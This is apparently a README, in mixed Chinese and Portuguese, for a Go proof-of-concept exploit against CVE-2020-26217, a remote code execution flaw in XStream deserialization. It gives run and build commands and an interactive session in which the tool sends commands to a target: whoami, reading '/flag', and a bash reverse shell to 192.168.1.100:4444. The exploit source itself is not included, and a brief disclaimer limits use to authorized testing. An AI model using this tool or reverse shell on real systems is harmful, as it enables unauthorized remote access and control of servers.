
CVE-2020-26217 XStream反序列化的poc
Ferramenta de exploração de vulnerabilidade de execução remota de código XStream.
CVE-2020-26217 é uma vulnerabilidade de desserialização na biblioteca XStream, onde um atacante pode acionar execução remota de código ao construir dados XML maliciosos.
Versão afetada: XStream <= 1.4.13
go run poc.go <目标URL>
# 运行工具
go run poc.go http://target.com:8080/?data
# 进入交互模式后输入命令
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
Esta ferramenta destina-se apenas a pesquisa de segurança e testes autorizados. Não use para fins ilegais. O usuário assume toda a responsabilidade legal relacionada.